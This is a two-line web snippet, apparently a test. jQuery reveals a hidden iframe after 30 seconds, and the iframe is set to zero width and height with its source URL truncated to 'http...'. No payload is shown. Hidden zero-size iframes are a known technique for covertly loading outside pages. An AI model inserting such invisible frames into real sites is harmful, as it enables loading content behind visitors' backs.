$(function () { setTimeout(function test() { $('#test2').show(); }, 30000) });
<iframe id="test2" style="display:none" src="http..." width=0 height=0 frameborder=0></iframe>